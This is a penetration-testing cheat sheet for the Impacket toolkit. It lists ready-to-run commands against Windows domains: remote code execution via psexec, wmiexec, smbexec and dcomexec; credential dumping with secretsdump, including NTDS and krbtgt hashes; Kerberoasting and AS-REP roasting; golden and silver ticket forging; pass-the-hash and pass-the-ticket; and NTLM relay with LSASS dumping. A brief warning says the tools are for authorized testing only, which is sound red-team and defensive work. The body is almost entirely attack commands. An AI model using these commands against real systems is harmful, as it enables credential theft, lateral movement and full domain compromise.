Quick Reference
Impacket Quick Reference
Hackers Manifest - hackersmanifest.com
Python tools for Windows network protocols and Active Directory attacks. Install: pipx install impacket (or use the Fortra fork for active maintenance).
Authorized Testing Only
Impacket tools execute remote code, dump credentials, and forge Kerberos tickets. They are heavily detected by EDR/SIEM and can disrupt production services.
Use only with explicit written authorization. For OPSEC, consider
-no-pass, custom service names (-service-name), and avoiding the noisy default share (ADMIN$).
MITRE ATT&CK Coverage
🖥️ Remote Execution
| PSExec | psexec.py DOMAIN/user:pass@TARGET |
| PSExec w/ hash | psexec.py DOMAIN/user@TARGET -hashes :NTLM |
| WMIExec | wmiexec.py DOMAIN/user:pass@TARGET |
| SMBExec | smbexec.py DOMAIN/user:pass@TARGET |
| ATExec | atexec.py DOMAIN/user:pass@TARGET "cmd" |
| DCOMExec | dcomexec.py -object MMC20 DOMAIN/user:pass@TARGET |
PSExec=Service | WMI=No file | DCOM=MMC/Shell
🔐 Credential Dumping
| Remote secrets | secretsdump.py DOMAIN/user:pass@TARGET |
| With hash | secretsdump.py DOMAIN/user@TARGET -hashes :NTLM |
| NTDS only (DC) | secretsdump.py DOMAIN/admin:pass@DC -just-dc |
| Specific user | secretsdump.py ... -just-dc-user krbtgt |
| From local SAM | secretsdump.py -sam SAM -system SYSTEM LOCAL |
| From NTDS | secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL |
🎫 Kerberos Attacks
| Get TGT | getTGT.py DOMAIN/user:pass -dc-ip DC_IP |
| TGT w/ hash | getTGT.py DOMAIN/user -hashes :NTLM -dc-ip DC_IP |
| Kerberoast | GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -request |
| AS-REP Roast | GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP |
| Request ST | getST.py -spn cifs/TARGET -impersonate admin DOMAIN/user:pass |
| Use ticket | export KRB5CCNAME=admin.ccache |
| Pass ticket | psexec.py -k -no-pass DOMAIN/admin@TARGET |
🎟️ Ticket Operations
| Golden Ticket | ticketer.py -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN admin |
| Silver Ticket | ticketer.py -nthash SVC_HASH -domain-sid SID -domain DOMAIN -spn cifs/target admin |
| kirbi → ccache | ticketConverter.py ticket.kirbi ticket.ccache |
| ccache → kirbi | ticketConverter.py ticket.ccache ticket.kirbi |
| Describe ticket | describeTicket.py ticket.ccache |
📁 SMB Operations
| SMB client | smbclient.py DOMAIN/user:pass@TARGET |
| List shares | shares (interactive) |
| Use share | use SHARE (interactive) |
| Get file | get filename (interactive) |
| Put file | put local remote (interactive) |
| SMB server | smbserver.py SHARE /path/to/share |
| SMBv2 server | smbserver.py -smb2support SHARE /path |
📂 LDAP & AD Queries
| Get AD users | GetADUsers.py DOMAIN/user:pass -dc-ip DC_IP -all |
| Find delegation | findDelegation.py DOMAIN/user:pass -dc-ip DC_IP |
| LDAP search | ldapsearch -x -H ldap://DC -b "DC=domain,DC=local" |
| lookupsid | lookupsid.py DOMAIN/user:pass@TARGET |
| samrdump | samrdump.py DOMAIN/user:pass@TARGET |
🔄 NTLM Relay
| Basic relay | ntlmrelayx.py -t TARGET |
| Relay to LDAP | ntlmrelayx.py -t ldap://DC --escalate-user USER |
| Dump secrets | ntlmrelayx.py -t TARGET --dump-lsass |
| Execute cmd | ntlmrelayx.py -t TARGET -c "whoami" |
| Target list | ntlmrelayx.py -tf targets.txt |
| Responder | responder -I eth0 |
🔧 Other Useful Tools
| Registry | reg.py DOMAIN/user:pass@TARGET query -keyName HKLM\\... |
| Services | services.py DOMAIN/user:pass@TARGET list |
| RPC map | rpcdump.py TARGET |
| MSSQL client | mssqlclient.py DOMAIN/user:pass@TARGET |
| Kerberos info | getKerberoastableUsers.py DOMAIN/user:pass@DC |
Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com